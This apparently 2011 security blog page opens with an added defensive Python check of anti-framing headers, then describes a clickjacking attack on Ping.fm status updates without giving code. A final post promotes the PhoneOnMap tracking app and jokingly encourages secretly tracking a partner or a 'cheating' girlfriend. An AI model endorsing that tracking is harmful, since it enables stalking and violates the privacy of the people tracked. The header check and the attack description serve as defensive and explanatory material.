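As an added example (not part of the original post), this Python function checks whether a set of response headers actually restricts framing. The function name and the sample headers are constructed for illustration, and the check of the Content-Security-Policy frame-ancestors directive goes beyond the header mentioned above.

```python
def framing_policy(headers):
    """Return (protected, reason) for a mapping of HTTP response headers."""
    h = {name.lower(): value for name, value in headers.items()}

    # Where a browser supports CSP frame-ancestors, it is enforced instead of
    # X-Frame-Options, so check it first.
    for directive in h.get("content-security-policy", "").split(";"):
        parts = directive.split()
        if not parts or parts[0].lower() != "frame-ancestors":
            continue
        sources = [p.lower() for p in parts[1:]]
        broad = [s for s in sources if s in ("*", "http:", "https:")]
        if broad:
            return False, "frame-ancestors allows any origin via " + " ".join(broad)
        if not sources or sources == ["'none'"]:
            return True, "frame-ancestors 'none'"
        return True, "frame-ancestors limited to " + " ".join(sources)

    xfo = h.get("x-frame-options")
    if xfo is None:
        return False, "no X-Frame-Options header and no frame-ancestors directive"
    value = xfo.strip().upper()
    if value in ("DENY", "SAMEORIGIN"):
        return True, "X-Frame-Options " + value
    # Misspelt values and the obsolete ALLOW-FROM form give no reliable protection.
    return False, "X-Frame-Options value not recognised: " + repr(xfo)


# Constructed response headers for illustration.
SAMPLES = {
    "correct": {"X-Frame-Options": "SAMEORIGIN"},
    "value typo": {"x-frame-options": "SAME ORIGIN"},
    "csp only": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "csp wildcard": {"Content-Security-Policy": "frame-ancestors *", "X-Frame-Options": "DENY"},
    "missing": {"Content-Type": "text/html"},
}

if __name__ == "__main__":
    for label, hdrs in SAMPLES.items():
        print(label, framing_policy(hdrs))
```

The "value typo" case shows why the exact spelling matters: a value the browser does not recognise is treated as if no protection had been set.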

Ping.fm is an online service which allows the user to connect to many social networks at once. However, an attacker could use clickjacking to silently update the user's social networking status on Twitter, Facebook and all other connected accounts. In this technique, the user is tricked into clicking a button on a webpage designed by the attacker, which silently updates the user's status on the social networks by taking advantage of the Ping.fm API and the clickjacking technique.

Video DEMO POC:



Trace Anyone's Mobile with G.P.S. and without G.P.S.

Do you doubt your boyfriend/girlfriend? Do you wanna track them via mobile location? This is now possible... I'm not joking. Many of us think that this is not possible or that we have to spend some money for such services, but believe me, we don't have to spend any money to get this done. Yes, PhoneOnMap makes it possible: it provides a free application that has to be installed on a G.P.S. cell phone, and then you are ready to track the phone from anywhere on the Internet.

This application can be useful for office work as well as for family members. You can track your child as well as your girlfriend/wife too (:P). PhoneOnMap can be used worldwide, and you can use it while travelling too. The data is stored on the company's server for a period of one month. This can be an invaluable source for the sales and marketing department of an organization to track its marketing agents.

If you are worried about the security and privacy of the service, let me tell you that it is very secure and your cell phone cannot be monitored by any unauthorized user: in order to access the tracking system, you have to authenticate yourself with a personal code which was used as identification while installing the application on the cell phone.


Features of the GPS cell phone tracking system:

1. The GPS cell phone tracker and locator will not work in underground transportation.
2. The application does not work when the phone is turned off.
3. Data transmission outside the provider's coverage area will add roaming charges, as with any other phone service.
4. Once the application is uninstalled from the cell phone, you can't do anything.
5. The Internet tracking system shows the cell phone's location at intervals of between 10 seconds and 10 minutes, depending on the setting.

According to me, this kind of service is very important for parents to track their children and, from a business usage point of view, an invaluable part of companies involved in supply and delivery systems like courier and home delivery. This will help them to get a real-time location of the object and provide an accurate timeframe for the delivery.

As of now this service does not provide the exact pinpoint location, but the location determined is in the range of 10-20 meters. However, with a little intelligence the exact location can be easily determined, especially when you wish to track your children or the cheating boyfriend/girlfriend…(lol)
 
Convex Coders © 2011 Convex-Coders. Supported by Code 104 and tech PANELS